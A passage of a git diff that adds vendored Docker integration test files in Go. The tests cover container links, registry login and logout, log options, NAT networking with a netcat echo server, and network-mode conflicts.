func(hosts []byte, hostname string) string { + re := regexp.MustCompile(fmt.Sprintf(`(\S*)\t%s`, regexp.QuoteMeta(hostname))) + matches := re.FindSubmatch(hosts) + c.Assert(matches, checker.NotNil, check.Commentf("Hostname %s have no matches in hosts", hostname)) + return string(matches[1]) + } + ip := getIP(content, "one") + c.Assert(ip, checker.Equals, realIP) + + ip = getIP(content, "onetwo") + c.Assert(ip, checker.Equals, realIP) + + dockerCmd(c, "restart", "one") + realIP = inspectField(c, "one", "NetworkSettings.Networks.bridge.IPAddress") + + content, err = readContainerFileWithExec(id, "/etc/hosts") + c.Assert(err, checker.IsNil, check.Commentf("content: %s", string(content))) + ip = getIP(content, "one") + c.Assert(ip, checker.Equals, realIP) + + ip = getIP(content, "onetwo") + c.Assert(ip, checker.Equals, realIP) +} + +func (s *DockerSuite) TestLinksEnvs(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "-e", "e1=", "-e", "e2=v2", "-e", "e3=v3=v3", "--name=first", "busybox", "top") + out, _ := dockerCmd(c, "run", "--name=second", "--link=first:first", "busybox", "env") + c.Assert(out, checker.Contains, "FIRST_ENV_e1=\n") + c.Assert(out, checker.Contains, "FIRST_ENV_e2=v2") + c.Assert(out, checker.Contains, "FIRST_ENV_e3=v3=v3") +} + +func (s *DockerSuite) TestLinkShortDefinition(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "--name", "shortlinkdef", "busybox", "top") + + cid := strings.TrimSpace(out) + c.Assert(waitRun(cid), checker.IsNil) + + out, _ = dockerCmd(c, "run", "-d", "--name", "link2", "--link", "shortlinkdef", "busybox", "top") + + cid2 := strings.TrimSpace(out) + c.Assert(waitRun(cid2), checker.IsNil) + + links := inspectFieldJSON(c, cid2, "HostConfig.Links") + c.Assert(links, checker.Equals, "[\"/shortlinkdef:/link2/shortlinkdef\"]") +} + +func (s *DockerSuite) TestLinksNetworkHostContainer(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + dockerCmd(c, "run", "-d", "--net", "host", "--name", "host_container", "busybox", "top") + out, _, err := dockerCmdWithError("run", "--name", "should_fail", "--link", "host_container:tester", "busybox", "true") + + // Running container linking to a container with --net host should have failed + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + // Running container linking to a container with --net host should have failed + c.Assert(out, checker.Contains, runconfig.ErrConflictHostNetworkAndLinks.Error()) +} + +func (s *DockerSuite) TestLinksEtcHostsRegularFile(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := dockerCmd(c, "run", "--net=host", "busybox", "ls", "-la", "/etc/hosts") + // /etc/hosts should be a regular file + c.Assert(out, checker.Matches, "^-.+\n") +} + +func (s *DockerSuite) TestLinksMultipleWithSameName(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name=upstream-a", "busybox", "top") + dockerCmd(c, "run", "-d", "--name=upstream-b", "busybox", "top") + dockerCmd(c, "run", "--link", "upstream-a:upstream", "--link", "upstream-b:upstream", "busybox", "sh", "-c", "ping -c 1 upstream") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go new file mode 100644 index 0000000000..1af927930d --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go @@ -0,0 +1,26 @@ +// +build !windows + +package main + +import ( + "io/ioutil" + "os" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestLinksEtcHostsContentMatch(c *check.C) { + // In a _unix file as using Unix specific files, and must be on the + // same host as the daemon. + testRequires(c, SameHostDaemon, NotUserNamespace) + + out, _ := dockerCmd(c, "run", "--net=host", "busybox", "cat", "/etc/hosts") + hosts, err := ioutil.ReadFile("/etc/hosts") + if os.IsNotExist(err) { + c.Skip("/etc/hosts does not exist, skip this test") + } + + c.Assert(out, checker.Equals, string(hosts), check.Commentf("container: %s\n\nhost:%s", out, hosts)) + +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go new file mode 100644 index 0000000000..01de75d985 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go @@ -0,0 +1,44 @@ +package main + +import ( + "bytes" + "os/exec" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestLoginWithoutTTY(c *check.C) { + cmd := exec.Command(dockerBinary, "login") + + // Send to stdin so the process does not get the TTY + cmd.Stdin = bytes.NewBufferString("buffer test string \n") + + // run the command and block until it's done + err := cmd.Run() + c.Assert(err, checker.NotNil) //"Expected non nil err when loginning in & TTY not available" +} + +func (s *DockerRegistryAuthHtpasswdSuite) TestLoginToPrivateRegistry(c *check.C) { + // wrong credentials + out, _, err := dockerCmdWithError("login", "-u", s.reg.username, "-p", "WRONGPASSWORD", privateRegistryURL) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "401 Unauthorized") + + // now it's fine + dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) +} + +func (s *DockerRegistryAuthHtpasswdSuite) TestLoginToPrivateRegistryDeprecatedEmailFlag(c *check.C) { + // Test to make sure login still works with the deprecated -e and --email flags + // wrong credentials + out, _, err := dockerCmdWithError("login", "-u", s.reg.username, "-p", "WRONGPASSWORD", "-e", s.reg.email, privateRegistryURL) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "401 Unauthorized") + + // now it's fine + // -e flag + dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, "-e", s.reg.email, privateRegistryURL) + // --email flag + dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, "--email", s.reg.email, privateRegistryURL) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go new file mode 100644 index 0000000000..a5f4b108cf --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go @@ -0,0 +1,100 @@ +package main + +import ( + "bytes" + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerRegistryAuthHtpasswdSuite) TestLogoutWithExternalAuth(c *check.C) { + osPath := os.Getenv("PATH") + defer os.Setenv("PATH", osPath) + + workingDir, err := os.Getwd() + c.Assert(err, checker.IsNil) + absolute, err := filepath.Abs(filepath.Join(workingDir, "fixtures", "auth")) + c.Assert(err, checker.IsNil) + testPath := fmt.Sprintf("%s%c%s", osPath, filepath.ListSeparator, absolute) + + os.Setenv("PATH", testPath) + + repoName := fmt.Sprintf("%v/dockercli/busybox:authtest", privateRegistryURL) + + tmp, err := ioutil.TempDir("", "integration-cli-") + c.Assert(err, checker.IsNil) + + externalAuthConfig := `{ "credsStore": "shell-test" }` + + configPath := filepath.Join(tmp, "config.json") + err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + + b, err := ioutil.ReadFile(configPath) + c.Assert(err, checker.IsNil) + c.Assert(string(b), checker.Not(checker.Contains), "\"auth\":") + c.Assert(string(b), checker.Contains, privateRegistryURL) + + dockerCmd(c, "--config", tmp, "tag", "busybox", repoName) + dockerCmd(c, "--config", tmp, "push", repoName) + + dockerCmd(c, "--config", tmp, "logout", privateRegistryURL) + + b, err = ioutil.ReadFile(configPath) + c.Assert(err, checker.IsNil) + c.Assert(string(b), checker.Not(checker.Contains), privateRegistryURL) + + // check I cannot pull anymore + out, _, err := dockerCmdWithError("--config", tmp, "pull", repoName) + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Error: image dockercli/busybox:authtest not found") +} + +// #23100 +func (s *DockerRegistryAuthHtpasswdSuite) TestLogoutWithWrongHostnamesStored(c *check.C) { + osPath := os.Getenv("PATH") + defer os.Setenv("PATH", osPath) + + workingDir, err := os.Getwd() + c.Assert(err, checker.IsNil) + absolute, err := filepath.Abs(filepath.Join(workingDir, "fixtures", "auth")) + c.Assert(err, checker.IsNil) + testPath := fmt.Sprintf("%s%c%s", osPath, filepath.ListSeparator, absolute) + + os.Setenv("PATH", testPath) + + cmd := exec.Command("docker-credential-shell-test", "store") + stdin := bytes.NewReader([]byte(fmt.Sprintf(`{"ServerURL": "https://%s", "Username": "%s", "Secret": "%s"}`, privateRegistryURL, s.reg.username, s.reg.password))) + cmd.Stdin = stdin + c.Assert(cmd.Run(), checker.IsNil) + + tmp, err := ioutil.TempDir("", "integration-cli-") + c.Assert(err, checker.IsNil) + + externalAuthConfig := fmt.Sprintf(`{ "auths": {"https://%s": {}}, "credsStore": "shell-test" }`, privateRegistryURL) + + configPath := filepath.Join(tmp, "config.json") + err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + + b, err := ioutil.ReadFile(configPath) + c.Assert(err, checker.IsNil) + c.Assert(string(b), checker.Contains, fmt.Sprintf("\"https://%s\": {}", privateRegistryURL)) + c.Assert(string(b), checker.Contains, fmt.Sprintf("\"%s\": {}", privateRegistryURL)) + + dockerCmd(c, "--config", tmp, "logout", privateRegistryURL) + + b, err = ioutil.ReadFile(configPath) + c.Assert(err, checker.IsNil) + c.Assert(string(b), checker.Not(checker.Contains), fmt.Sprintf("\"https://%s\": {}", privateRegistryURL)) + c.Assert(string(b), checker.Not(checker.Contains), fmt.Sprintf("\"%s\": {}", privateRegistryURL)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_bench_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_bench_test.go new file mode 100644 index 0000000000..eeb008de70 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_bench_test.go @@ -0,0 +1,32 @@ +package main + +import ( + "fmt" + "strings" + "time" + + "github.com/go-check/check" +) + +func (s *DockerSuite) BenchmarkLogsCLIRotateFollow(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "--log-opt", "max-size=1b", "--log-opt", "max-file=10", "busybox", "sh", "-c", "while true; do usleep 50000; echo hello; done") + id := strings.TrimSpace(out) + ch := make(chan error, 1) + go func() { + ch <- nil + out, _, _ := dockerCmdWithError("logs", "-f", id) + // if this returns at all, it's an error + ch <- fmt.Errorf(out) + }() + + <-ch + select { + case <-time.After(30 * time.Second): + // ran for 30 seconds with no problem + return + case err := <-ch: + if err != nil { + c.Fatal(err) + } + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go new file mode 100644 index 0000000000..d2dcad1052 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go @@ -0,0 +1,328 @@ +package main + +import ( + "fmt" + "io" + "os/exec" + "regexp" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/jsonlog" + "github.com/go-check/check" +) + +// This used to work, it test a log of PageSize-1 (gh#4851) +func (s *DockerSuite) TestLogsContainerSmallerThanPage(c *check.C) { + testLen := 32767 + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo -n = >> a.a; done; echo >> a.a; cat a.a", testLen)) + + id := strings.TrimSpace(out) + dockerCmd(c, "wait", id) + + out, _ = dockerCmd(c, "logs", id) + + c.Assert(out, checker.HasLen, testLen+1) +} + +// Regression test: When going over the PageSize, it used to panic (gh#4851) +func (s *DockerSuite) TestLogsContainerBiggerThanPage(c *check.C) { + testLen := 32768 + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo -n = >> a.a; done; echo >> a.a; cat a.a", testLen)) + + id := strings.TrimSpace(out) + dockerCmd(c, "wait", id) + + out, _ = dockerCmd(c, "logs", id) + + c.Assert(out, checker.HasLen, testLen+1) +} + +// Regression test: When going much over the PageSize, it used to block (gh#4851) +func (s *DockerSuite) TestLogsContainerMuchBiggerThanPage(c *check.C) { + testLen := 33000 + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo -n = >> a.a; done; echo >> a.a; cat a.a", testLen)) + + id := strings.TrimSpace(out) + dockerCmd(c, "wait", id) + + out, _ = dockerCmd(c, "logs", id) + + c.Assert(out, checker.HasLen, testLen+1) +} + +func (s *DockerSuite) TestLogsTimestamps(c *check.C) { + testLen := 100 + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo = >> a.a; done; cat a.a", testLen)) + + id := strings.TrimSpace(out) + dockerCmd(c, "wait", id) + + out, _ = dockerCmd(c, "logs", "-t", id) + + lines := strings.Split(out, "\n") + + c.Assert(lines, checker.HasLen, testLen+1) + + ts := regexp.MustCompile(`^.* `) + + for _, l := range lines { + if l != "" { + _, err := time.Parse(jsonlog.RFC3339NanoFixed+" ", ts.FindString(l)) + c.Assert(err, checker.IsNil, check.Commentf("Failed to parse timestamp from %v", l)) + // ensure we have padded 0's + c.Assert(l[29], checker.Equals, uint8('Z')) + } + } +} + +func (s *DockerSuite) TestLogsSeparateStderr(c *check.C) { + msg := "stderr_log" + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("echo %s 1>&2", msg)) + + id := strings.TrimSpace(out) + dockerCmd(c, "wait", id) + + stdout, stderr, _ := dockerCmdWithStdoutStderr(c, "logs", id) + + c.Assert(stdout, checker.Equals, "") + + stderr = strings.TrimSpace(stderr) + + c.Assert(stderr, checker.Equals, msg) +} + +func (s *DockerSuite) TestLogsStderrInStdout(c *check.C) { + // TODO Windows: Needs investigation why this fails. Obtained string includes + // a bunch of ANSI escape sequences before the "stderr_log" message. + testRequires(c, DaemonIsLinux) + msg := "stderr_log" + out, _ := dockerCmd(c, "run", "-d", "-t", "busybox", "sh", "-c", fmt.Sprintf("echo %s 1>&2", msg)) + + id := strings.TrimSpace(out) + dockerCmd(c, "wait", id) + + stdout, stderr, _ := dockerCmdWithStdoutStderr(c, "logs", id) + c.Assert(stderr, checker.Equals, "") + + stdout = strings.TrimSpace(stdout) + c.Assert(stdout, checker.Equals, msg) +} + +func (s *DockerSuite) TestLogsTail(c *check.C) { + testLen := 100 + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo =; done;", testLen)) + + id := strings.TrimSpace(out) + dockerCmd(c, "wait", id) + + out, _ = dockerCmd(c, "logs", "--tail", "0", id) + lines := strings.Split(out, "\n") + c.Assert(lines, checker.HasLen, 1) + + out, _ = dockerCmd(c, "logs", "--tail", "5", id) + lines = strings.Split(out, "\n") + c.Assert(lines, checker.HasLen, 6) + + out, _ = dockerCmd(c, "logs", "--tail", "99", id) + lines = strings.Split(out, "\n") + c.Assert(lines, checker.HasLen, 100) + + out, _ = dockerCmd(c, "logs", "--tail", "all", id) + lines = strings.Split(out, "\n") + c.Assert(lines, checker.HasLen, testLen+1) + + out, _ = dockerCmd(c, "logs", "--tail", "-1", id) + lines = strings.Split(out, "\n") + c.Assert(lines, checker.HasLen, testLen+1) + + out, _, _ = dockerCmdWithStdoutStderr(c, "logs", "--tail", "random", id) + lines = strings.Split(out, "\n") + c.Assert(lines, checker.HasLen, testLen+1) +} + +func (s *DockerSuite) TestLogsFollowStopped(c *check.C) { + dockerCmd(c, "run", "--name=test", "busybox", "echo", "hello") + id, err := getIDByName("test") + c.Assert(err, check.IsNil) + + logsCmd := exec.Command(dockerBinary, "logs", "-f", id) + c.Assert(logsCmd.Start(), checker.IsNil) + + errChan := make(chan error) + go func() { + errChan <- logsCmd.Wait() + close(errChan) + }() + + select { + case err := <-errChan: + c.Assert(err, checker.IsNil) + case <-time.After(30 * time.Second): + c.Fatal("Following logs is hanged") + } +} + +func (s *DockerSuite) TestLogsSince(c *check.C) { + name := "testlogssince" + dockerCmd(c, "run", "--name="+name, "busybox", "/bin/sh", "-c", "for i in $(seq 1 3); do sleep 2; echo log$i; done") + out, _ := dockerCmd(c, "logs", "-t", name) + + log2Line := strings.Split(strings.Split(out, "\n")[1], " ") + t, err := time.Parse(time.RFC3339Nano, log2Line[0]) // the timestamp log2 is written + c.Assert(err, checker.IsNil) + since := t.Unix() + 1 // add 1s so log1 & log2 doesn't show up + out, _ = dockerCmd(c, "logs", "-t", fmt.Sprintf("--since=%v", since), name) + + // Skip 2 seconds + unexpected := []string{"log1", "log2"} + for _, v := range unexpected { + c.Assert(out, checker.Not(checker.Contains), v, check.Commentf("unexpected log message returned, since=%v", since)) + } + + // Test to make sure a bad since format is caught by the client + out, _, _ = dockerCmdWithError("logs", "-t", "--since=2006-01-02T15:04:0Z", name) + c.Assert(out, checker.Contains, "cannot parse \"0Z\" as \"05\"", check.Commentf("bad since format passed to server")) + + // Test with default value specified and parameter omitted + expected := []string{"log1", "log2", "log3"} + for _, cmd := range []*exec.Cmd{ + exec.Command(dockerBinary, "logs", "-t", name), + exec.Command(dockerBinary, "logs", "-t", "--since=0", name), + } { + out, _, err = runCommandWithOutput(cmd) + c.Assert(err, checker.IsNil, check.Commentf("failed to log container: %s", out)) + for _, v := range expected { + c.Assert(out, checker.Contains, v) + } + } +} + +func (s *DockerSuite) TestLogsSinceFutureFollow(c *check.C) { + // TODO Windows TP5 - Figure out why this test is so flakey. Disabled for now. + testRequires(c, DaemonIsLinux) + name := "testlogssincefuturefollow" + out, _ := dockerCmd(c, "run", "-d", "--name", name, "busybox", "/bin/sh", "-c", `for i in $(seq 1 5); do echo log$i; sleep 1; done`) + + // Extract one timestamp from the log file to give us a starting point for + // our `--since` argument. Because the log producer runs in the background, + // we need to check repeatedly for some output to be produced. + var timestamp string + for i := 0; i != 100 && timestamp == ""; i++ { + if out, _ = dockerCmd(c, "logs", "-t", name); out == "" { + time.Sleep(time.Millisecond * 100) // Retry + } else { + timestamp = strings.Split(strings.Split(out, "\n")[0], " ")[0] + } + } + + c.Assert(timestamp, checker.Not(checker.Equals), "") + t, err := time.Parse(time.RFC3339Nano, timestamp) + c.Assert(err, check.IsNil) + + since := t.Unix() + 2 + out, _ = dockerCmd(c, "logs", "-t", "-f", fmt.Sprintf("--since=%v", since), name) + c.Assert(out, checker.Not(checker.HasLen), 0, check.Commentf("cannot read from empty log")) + lines := strings.Split(strings.TrimSpace(out), "\n") + for _, v := range lines { + ts, err := time.Parse(time.RFC3339Nano, strings.Split(v, " ")[0]) + c.Assert(err, checker.IsNil, check.Commentf("cannot parse timestamp output from log: '%v'", v)) + c.Assert(ts.Unix() >= since, checker.Equals, true, check.Commentf("earlier log found. since=%v logdate=%v", since, ts)) + } +} + +// Regression test for #8832 +func (s *DockerSuite) TestLogsFollowSlowStdoutConsumer(c *check.C) { + // TODO Windows: Fix this test for TP5. + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", `usleep 600000;yes X | head -c 200000`) + + id := strings.TrimSpace(out) + + stopSlowRead := make(chan bool) + + go func() { + exec.Command(dockerBinary, "wait", id).Run() + stopSlowRead <- true + }() + + logCmd := exec.Command(dockerBinary, "logs", "-f", id) + stdout, err := logCmd.StdoutPipe() + c.Assert(err, checker.IsNil) + c.Assert(logCmd.Start(), checker.IsNil) + + // First read slowly + bytes1, err := consumeWithSpeed(stdout, 10, 50*time.Millisecond, stopSlowRead) + c.Assert(err, checker.IsNil) + + // After the container has finished we can continue reading fast + bytes2, err := consumeWithSpeed(stdout, 32*1024, 0, nil) + c.Assert(err, checker.IsNil) + + actual := bytes1 + bytes2 + expected := 200000 + c.Assert(actual, checker.Equals, expected) +} + +func (s *DockerSuite) TestLogsFollowGoroutinesWithStdout(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "while true; do echo hello; sleep 2; done") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + nroutines, err := getGoroutineNumber() + c.Assert(err, checker.IsNil) + cmd := exec.Command(dockerBinary, "logs", "-f", id) + r, w := io.Pipe() + cmd.Stdout = w + c.Assert(cmd.Start(), checker.IsNil) + + // Make sure pipe is written to + chErr := make(chan error) + go func() { + b := make([]byte, 1) + _, err := r.Read(b) + chErr <- err + }() + c.Assert(<-chErr, checker.IsNil) + c.Assert(cmd.Process.Kill(), checker.IsNil) + + // NGoroutines is not updated right away, so we need to wait before failing + c.Assert(waitForGoroutines(nroutines), checker.IsNil) +} + +func (s *DockerSuite) TestLogsFollowGoroutinesNoOutput(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "while true; do sleep 2; done") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + nroutines, err := getGoroutineNumber() + c.Assert(err, checker.IsNil) + cmd := exec.Command(dockerBinary, "logs", "-f", id) + c.Assert(cmd.Start(), checker.IsNil) + time.Sleep(200 * time.Millisecond) + c.Assert(cmd.Process.Kill(), checker.IsNil) + + // NGoroutines is not updated right away, so we need to wait before failing + c.Assert(waitForGoroutines(nroutines), checker.IsNil) +} + +func (s *DockerSuite) TestLogsCLIContainerNotFound(c *check.C) { + name := "testlogsnocontainer" + out, _, _ := dockerCmdWithError("logs", name) + message := fmt.Sprintf("Error: No such container: %s\n", name) + c.Assert(out, checker.Equals, message) +} + +func (s *DockerSuite) TestLogsWithDetails(c *check.C) { + dockerCmd(c, "run", "--name=test", "--label", "foo=bar", "-e", "baz=qux", "--log-opt", "labels=foo", "--log-opt", "env=baz", "busybox", "echo", "hello") + out, _ := dockerCmd(c, "logs", "--details", "--timestamps", "test") + + logFields := strings.Fields(strings.TrimSpace(out)) + c.Assert(len(logFields), checker.Equals, 3, check.Commentf(out)) + + details := strings.Split(logFields[1], ",") + c.Assert(details, checker.HasLen, 2) + c.Assert(details[0], checker.Equals, "baz=qux") + c.Assert(details[1], checker.Equals, "foo=bar") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go new file mode 100644 index 0000000000..7f4cc2cbd7 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go @@ -0,0 +1,93 @@ +package main + +import ( + "fmt" + "io/ioutil" + "net" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func startServerContainer(c *check.C, msg string, port int) string { + name := "server" + cmd := []string{ + "-d", + "-p", fmt.Sprintf("%d:%d", port, port), + "busybox", + "sh", "-c", fmt.Sprintf("echo %q | nc -lp %d", msg, port), + } + c.Assert(waitForContainer(name, cmd...), check.IsNil) + return name +} + +func getExternalAddress(c *check.C) net.IP { + iface, err := net.InterfaceByName("eth0") + if err != nil { + c.Skip(fmt.Sprintf("Test not running with `make test`. Interface eth0 not found: %v", err)) + } + + ifaceAddrs, err := iface.Addrs() + c.Assert(err, check.IsNil) + c.Assert(ifaceAddrs, checker.Not(checker.HasLen), 0) + + ifaceIP, _, err := net.ParseCIDR(ifaceAddrs[0].String()) + c.Assert(err, check.IsNil) + + return ifaceIP +} + +func getContainerLogs(c *check.C, containerID string) string { + out, _ := dockerCmd(c, "logs", containerID) + return strings.Trim(out, "\r\n") +} + +func getContainerStatus(c *check.C, containerID string) string { + out := inspectField(c, containerID, "State.Running") + return out +} + +func (s *DockerSuite) TestNetworkNat(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + msg := "it works" + startServerContainer(c, msg, 8080) + endpoint := getExternalAddress(c) + conn, err := net.Dial("tcp", fmt.Sprintf("%s:%d", endpoint.String(), 8080)) + c.Assert(err, check.IsNil) + + data, err := ioutil.ReadAll(conn) + conn.Close() + c.Assert(err, check.IsNil) + + final := strings.TrimRight(string(data), "\n") + c.Assert(final, checker.Equals, msg) +} + +func (s *DockerSuite) TestNetworkLocalhostTCPNat(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + var ( + msg = "hi yall" + ) + startServerContainer(c, msg, 8081) + conn, err := net.Dial("tcp", "localhost:8081") + c.Assert(err, check.IsNil) + + data, err := ioutil.ReadAll(conn) + conn.Close() + c.Assert(err, check.IsNil) + + final := strings.TrimRight(string(data), "\n") + c.Assert(final, checker.Equals, msg) +} + +func (s *DockerSuite) TestNetworkLoopbackNat(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace) + msg := "it works" + startServerContainer(c, msg, 8080) + endpoint := getExternalAddress(c) + out, _ := dockerCmd(c, "run", "-t", "--net=container:server", "busybox", + "sh", "-c", fmt.Sprintf("stty raw && nc -w 5 %s 8080", endpoint.String())) + final := strings.TrimRight(string(out), "\n") + c.Assert(final, checker.Equals, msg) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go new file mode 100644 index 0000000000..4dfad937b5 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go @@ -0,0 +1,94 @@ +package main + +import ( + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/runconfig" + "github.com/go-check/check" +) + +// GH14530. Validates combinations of --net= with other options + +// stringCheckPS is how the output of PS starts in order to validate that +// the command executed in a container did really run PS correctly. +const stringCheckPS = "PID USER" + +// DockerCmdWithFail executes a docker command that is supposed to fail and returns +// the output, the exit code. If the command returns a Nil error, it will fail and +// stop the tests. +func dockerCmdWithFail(c *check.C, args ...string) (string, int) { + out, status, err := dockerCmdWithError(args...) + c.Assert(err, check.NotNil, check.Commentf("%v", out)) + return out, status +} + +func (s *DockerSuite) TestNetHostnameWithNetHost(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + + out, _ := dockerCmd(c, "run", "--net=host", "busybox", "ps") + c.Assert(out, checker.Contains, stringCheckPS) +} + +func (s *DockerSuite) TestNetHostname(c *check.C) { + testRequires(c, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-h=name", "busybox", "ps") + c.Assert(out, checker.Contains, stringCheckPS) + + out, _ = dockerCmd(c, "run", "-h=name", "--net=bridge", "busybox", "ps") + c.Assert(out, checker.Contains, stringCheckPS) + + out, _ = dockerCmd(c, "run", "-h=name", "--net=none", "busybox", "ps") + c.Assert(out, checker.Contains, stringCheckPS) + + out, _ = dockerCmdWithFail(c, "run", "-h=name", "--net=container:other", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictNetworkHostname.Error()) + + out, _ = dockerCmdWithFail(c, "run", "--net=container", "busybox", "ps") + c.Assert(out, checker.Contains, "--net: invalid net mode: invalid container format container:") + + out, _ = dockerCmdWithFail(c, "run", "--net=weird", "busybox", "ps") + c.Assert(out, checker.Contains, "network weird not found") +} + +func (s *DockerSuite) TestConflictContainerNetworkAndLinks(c *check.C) { + testRequires(c, DaemonIsLinux) + + out, _ := dockerCmdWithFail(c, "run", "--net=container:other", "--link=zip:zap", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictContainerNetworkAndLinks.Error()) +} + +func (s *DockerSuite) TestConflictContainerNetworkHostAndLinks(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + + out, _ := dockerCmdWithFail(c, "run", "--net=host", "--link=zip:zap", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictHostNetworkAndLinks.Error()) +} + +func (s *DockerSuite) TestConflictNetworkModeNetHostAndOptions(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + + out, _ := dockerCmdWithFail(c, "run", "--net=host", "--mac-address=92:d0:c6:0a:29:33", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictContainerNetworkAndMac.Error()) +} + +func (s *DockerSuite) TestConflictNetworkModeAndOptions(c *check.C) { + testRequires(c, DaemonIsLinux) + + out, _ := dockerCmdWithFail(c, "run", "--net=container:other", "--dns=8.8.8.8", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictNetworkAndDNS.Error()) + + out, _ = dockerCmdWithFail(c, "run", "--net=container:other", "--add-host=name:8.8.8.8", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictNetworkHosts.Error()) + + out, _ = dockerCmdWithFail(c, "run", "--net=container:other", "--mac-address=92:d0:c6:0a:29:33", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictContainerNetworkAndMac.Error()) + + out, _ = dockerCmdWithFail(c, "run", "--net=container:other", "-P", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictNetworkPublishPorts.Error()) + + out, _ = dockerCmdWithFail(c, "run", "--net=container:other", "-p", "8080", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictNetworkPublishPorts.Error()) + + out, _ = dockerCmdWithFail(c, "run", "--net=container:other", "--expose", "8000-9000", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictNetworkExposePorts.Error()) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go new file mode 100644 index 0000000000..97f204ab47 --- /dev/null +++ 